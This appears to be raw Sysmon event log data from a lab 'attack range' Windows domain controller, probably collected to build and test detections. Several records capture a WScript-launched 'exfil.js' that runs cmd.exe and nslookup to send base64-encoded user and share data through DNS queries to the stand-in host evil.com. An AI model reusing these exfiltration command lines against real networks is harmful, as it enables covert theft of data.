14:21:34.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.013{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-FB43-000000005F02}3736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.013{2E1864BB-18ED-629A-F943-000000005F02}66607072C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-FB43-000000005F02}3736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.024{2E1864BB-18EE-629A-FB43-000000005F02}3736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-F943-000000005F02}6660C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlovrd.tmp 2>&1 10341000x8000000000000000209730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.997{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-FA43-000000005F02}6092C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.997{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-FA43-000000005F02}6092C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.997{2E1864BB-18ED-629A-FA43-000000005F02}60926848C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-F943-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044803Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:34.471{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45A843A1E8A5D7FAD0CF765ED36969F2,SHA256=9896D70C49A0FF1E9A69BFD2CED9903F943D0565D930AD3311999977233757B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000210491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.997{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxr.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.960{2E1864BB-18EF-629A-4544-000000005F02}65567912C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-4644-000000005F02}7240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.960{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.960{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.960{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.960{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.960{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-4644-000000005F02}7240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.960{2E1864BB-18EF-629A-4444-000000005F02}70283500C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-4644-000000005F02}7240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.971{2E1864BB-18EF-629A-4644-000000005F02}7240C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-4444-000000005F02}7028C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxr.tmp 2>&1 10341000x8000000000000000210482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.944{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-4544-000000005F02}6556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.944{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-4544-000000005F02}6556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.944{2E1864BB-18EF-629A-4544-000000005F02}65567912C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-4444-000000005F02}7028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.928{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-4544-000000005F02}6556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.913{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-4444-000000005F02}7028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.913{2E1864BB-18E0-629A-6742-000000005F02}39765420C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-4444-000000005F02}7028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.924{2E1864BB-18EF-629A-4444-000000005F02}7028C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.913{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcwgmlhs.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.897{2E1864BB-18EF-629A-4244-000000005F02}75242244C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-4344-000000005F02}5168C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.897{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 